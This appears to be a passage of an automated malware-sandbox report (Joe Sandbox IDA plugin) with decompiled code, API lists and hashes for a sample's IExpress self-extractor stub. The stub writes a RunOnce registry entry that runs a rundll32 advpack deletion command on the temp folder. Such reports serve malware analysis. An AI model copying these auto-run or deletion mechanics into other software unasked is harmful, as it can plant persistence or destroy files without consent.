                                                                                                                                                                                                                                            • Opcode ID: a68b9ed4b1ed5cec6d133ca370bd651c0782fce033b1966d4d3ae81eb6b1f479
                                                                                                                                                                                                                                            • Instruction ID: 651cd56c74a6c6e13e78586ee337725a317d368169a893b838fd471a5e2a8a37
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a68b9ed4b1ed5cec6d133ca370bd651c0782fce033b1966d4d3ae81eb6b1f479
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31316D32704641ABCB21EBA4DD89AEB73ECABC4305F14492FB59586290EF3499498792
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E00A92BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0xa9a288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0xa99124 = 0;
                                                                                                                                                                                                                                            				if(E00A92CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E00A92F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E00A952B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0xa98a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0xa99a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E00A91F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0xa98588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0xa99124; // 0x0
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a92c03
                                                                                                                                                                                                                                            0x00a92c0d
                                                                                                                                                                                                                                            0x00a92c18
                                                                                                                                                                                                                                            0x00a92c20
                                                                                                                                                                                                                                            0x00a92c2e
                                                                                                                                                                                                                                            0x00a92c32
                                                                                                                                                                                                                                            0x00a92c36
                                                                                                                                                                                                                                            0x00a92c3d
                                                                                                                                                                                                                                            0x00a92c43
                                                                                                                                                                                                                                            0x00a92c45
                                                                                                                                                                                                                                            0x00a92c47
                                                                                                                                                                                                                                            0x00a92c49
                                                                                                                                                                                                                                            0x00a92c4e
                                                                                                                                                                                                                                            0x00a92c4e
                                                                                                                                                                                                                                            0x00a92c47
                                                                                                                                                                                                                                            0x00a92c32
                                                                                                                                                                                                                                            0x00a92c20
                                                                                                                                                                                                                                            0x00a92c50
                                                                                                                                                                                                                                            0x00a92c54
                                                                                                                                                                                                                                            0x00a92c57
                                                                                                                                                                                                                                            0x00a92c64
                                                                                                                                                                                                                                            0x00a92c66
                                                                                                                                                                                                                                            0x00a92c6b
                                                                                                                                                                                                                                            0x00a92c6d
                                                                                                                                                                                                                                            0x00a92c74
                                                                                                                                                                                                                                            0x00a92c76
                                                                                                                                                                                                                                            0x00a92c7c
                                                                                                                                                                                                                                            0x00a92c7e
                                                                                                                                                                                                                                            0x00a92c87
                                                                                                                                                                                                                                            0x00a92c89
                                                                                                                                                                                                                                            0x00a92c89
                                                                                                                                                                                                                                            0x00a92c87
                                                                                                                                                                                                                                            0x00a92c7c
                                                                                                                                                                                                                                            0x00a92c74
                                                                                                                                                                                                                                            0x00a92c8e
                                                                                                                                                                                                                                            0x00a92c95
                                                                                                                                                                                                                                            0x00a92c98
                                                                                                                                                                                                                                            0x00a92c98
                                                                                                                                                                                                                                            0x00a92c9e
                                                                                                                                                                                                                                            0x00a92ca7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A92C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 86706883d08b9b3eb560ee00a25cc52824c74ea29721219580c1cdd25e2a9aec
                                                                                                                                                                                                                                            • Instruction ID: c3084d0e2f996b7c77293d138436475bf63e07ca5546ba7a1a7f64fc9970671f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86706883d08b9b3eb560ee00a25cc52824c74ea29721219580c1cdd25e2a9aec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C11AC313012067BDF20ABF9AD89F6F37E9AB89391B05012BB901D7291DE31DC0287A5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A96F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00A96EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a96f45
                                                                                                                                                                                                                                            0x00a96f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A96F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: e17c29d7a03c4d176120ea8a7d193f98cf91334f96c50d08cfde71e9d407d69b
                                                                                                                                                                                                                                            • Instruction ID: 170315c71201bf958f06280dc98a750d9ff9d8ab52585a099303385348cc0bd0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e17c29d7a03c4d176120ea8a7d193f98cf91334f96c50d08cfde71e9d407d69b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4090026435111057DA105BB09D1941575D16E5D642B915962A011C4494DF6044415552
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A9202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E00A96CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A9171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E00A9658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0xa99a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0xa991e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - 0xa991e5;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa991e5);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0xa98580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            							E00A9171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E00A944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E00A9658A( &_v268, 0x104, 0xa91140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0xa98530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x00a9202a
                                                                                                                                                                                                                                            0x00a92035
                                                                                                                                                                                                                                            0x00a9203c
                                                                                                                                                                                                                                            0x00a92041
                                                                                                                                                                                                                                            0x00a92050
                                                                                                                                                                                                                                            0x00a9205f
                                                                                                                                                                                                                                            0x00a92064
                                                                                                                                                                                                                                            0x00a9206f
                                                                                                                                                                                                                                            0x00a9208c
                                                                                                                                                                                                                                            0x00a92094
                                                                                                                                                                                                                                            0x00a92257
                                                                                                                                                                                                                                            0x00a92266
                                                                                                                                                                                                                                            0x00a92266
                                                                                                                                                                                                                                            0x00a9209a
                                                                                                                                                                                                                                            0x00a9209b
                                                                                                                                                                                                                                            0x00a9209d
                                                                                                                                                                                                                                            0x00a920aa
                                                                                                                                                                                                                                            0x00a920af
                                                                                                                                                                                                                                            0x00a920c9
                                                                                                                                                                                                                                            0x00a920d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a920d3
                                                                                                                                                                                                                                            0x00a920da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a920da
                                                                                                                                                                                                                                            0x00a920e2
                                                                                                                                                                                                                                            0x00a92103
                                                                                                                                                                                                                                            0x00a9210e
                                                                                                                                                                                                                                            0x00a92116
                                                                                                                                                                                                                                            0x00a92122
                                                                                                                                                                                                                                            0x00a92128
                                                                                                                                                                                                                                            0x00a9212c
                                                                                                                                                                                                                                            0x00a92179
                                                                                                                                                                                                                                            0x00a92194
                                                                                                                                                                                                                                            0x00a921de
                                                                                                                                                                                                                                            0x00a921e4
                                                                                                                                                                                                                                            0x00a92256
                                                                                                                                                                                                                                            0x00a92256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92256
                                                                                                                                                                                                                                            0x00a92196
                                                                                                                                                                                                                                            0x00a92196
                                                                                                                                                                                                                                            0x00a9219c
                                                                                                                                                                                                                                            0x00a9219f
                                                                                                                                                                                                                                            0x00a9219f
                                                                                                                                                                                                                                            0x00a921a1
                                                                                                                                                                                                                                            0x00a921a2
                                                                                                                                                                                                                                            0x00a921a6
                                                                                                                                                                                                                                            0x00a921a8
                                                                                                                                                                                                                                            0x00a921b0
                                                                                                                                                                                                                                            0x00a921b0
                                                                                                                                                                                                                                            0x00a921b2
                                                                                                                                                                                                                                            0x00a921b3
                                                                                                                                                                                                                                            0x00a921bc
                                                                                                                                                                                                                                            0x00a921c7
                                                                                                                                                                                                                                            0x00a921cb
                                                                                                                                                                                                                                            0x00a921f1
                                                                                                                                                                                                                                            0x00a921f6
                                                                                                                                                                                                                                            0x00a921fd
                                                                                                                                                                                                                                            0x00a921ff
                                                                                                                                                                                                                                            0x00a921ff
                                                                                                                                                                                                                                            0x00a92204
                                                                                                                                                                                                                                            0x00a92213
                                                                                                                                                                                                                                            0x00a92218
                                                                                                                                                                                                                                            0x00a9221d
                                                                                                                                                                                                                                            0x00a9221d
                                                                                                                                                                                                                                            0x00a92220
                                                                                                                                                                                                                                            0x00a92220
                                                                                                                                                                                                                                            0x00a92222
                                                                                                                                                                                                                                            0x00a92223
                                                                                                                                                                                                                                            0x00a92229
                                                                                                                                                                                                                                            0x00a9223d
                                                                                                                                                                                                                                            0x00a92249
                                                                                                                                                                                                                                            0x00a92250
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92250
                                                                                                                                                                                                                                            0x00a921d2
                                                                                                                                                                                                                                            0x00a921d9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a921d9
                                                                                                                                                                                                                                            0x00a9213a
                                                                                                                                                                                                                                            0x00a92141
                                                                                                                                                                                                                                            0x00a92144
                                                                                                                                                                                                                                            0x00a9214c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92163
                                                                                                                                                                                                                                            0x00a92172
                                                                                                                                                                                                                                            0x00a92172
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92163
                                                                                                                                                                                                                                            0x00a920ea
                                                                                                                                                                                                                                            0x00a920f0
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A92050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A9205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A9208C
                                                                                                                                                                                                                                              • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A920C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A920EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A92103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A92134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A9215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A9218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A921C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A921E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A9223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 178549006-2699677747
                                                                                                                                                                                                                                            • Opcode ID: 5b6fe9951d3711443b083a367e4ebcd9f18b1e5b39712b6bf8981ef9520e739f
                                                                                                                                                                                                                                            • Instruction ID: f841b6efb795bfe8219742bb1244300f354a4444d5ed182c06a81c93bb212e31
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b6fe9951d3711443b083a367e4ebcd9f18b1e5b39712b6bf8981ef9520e739f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C510775B00214BBDF20DBA4DC49FFB77BCEB55700F1002AAB909E6150DE759D4A8B90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 232 a955a0-a955d9 call a9468f LocalAlloc 235 a955db-a955f1 call a944b9 call a96285 232->235 236 a955fd-a9560c call a9468f 232->236 251 a955f6-a955f8 235->251 241 a9560e-a95630 call a944b9 LocalFree 236->241 242 a95632-a95643 lstrcmpA 236->242 241->251 245 a9564b-a95659 LocalFree 242->245 246 a95645 242->246 249 a9565b-a9565d 245->249 250 a95696-a9569c 245->250 246->245 254 a95669 249->254 255 a9565f-a95667 249->255 252 a9589f-a958b5 call a96517 250->252 253 a956a2-a956a8 250->253 256 a958b7-a958c7 call a96ce0 251->256 252->256 253->252 257 a956ae-a956c1 GetTempPathA 253->257 258 a9566b-a9567a call a95467 254->258 255->254 255->258 262 a956f3-a95711 call a91781 257->262 263 a956c3-a956c9 call a95467 257->263 270 a9589b-a9589d 258->270 271 a95680-a95691 call a944b9 258->271 275 a9586c-a95890 GetWindowsDirectoryA call a9597d 262->275 276 a95717-a95729 GetDriveTypeA 262->276 269 a956ce-a956d0 263->269 269->270 273 a956d6-a956df call a92630 269->273 270->256 271->251 273->262 288 a956e1-a956ed call a95467 273->288 275->262 289 a95896 275->289 280 a9572b-a9572e 276->280 281 a95730-a95740 GetFileAttributesA 276->281 280->281 282 a95742-a95745 280->282 281->282 283 a9577e-a9578f call a9597d 281->283 286 a9576b 282->286 287 a95747-a9574f 282->287 298 a95791-a9579e call a92630 283->298 299 a957b2-a957bf call a92630 283->299 291 a95771-a95779 286->291 287->291 292 a95751-a95753 287->292 288->262 288->270 289->270 296 a95864-a95866 291->296 292->291 295 a95755-a95762 call a96952 292->295 295->286 309 a95764-a95769 295->309 296->275 296->276 298->286 306 a957a0-a957b0 call a9597d 298->306 307 a957c1-a957cd GetWindowsDirectoryA 299->307 308 a957d3-a957f8 call a9658a GetFileAttributesA 299->308 306->286 306->299 307->308 314 a9580a 308->314 315 a957fa-a95808 CreateDirectoryA 308->315 309->283 309->286 316 a9580d-a9580f 314->316 315->316 317 a95811-a95825 316->317 318 a95827-a9585c SetFileAttributesA call a91781 call a95467 316->318 317->296 318->270 323 a9585e 318->323 323->296
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A955A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
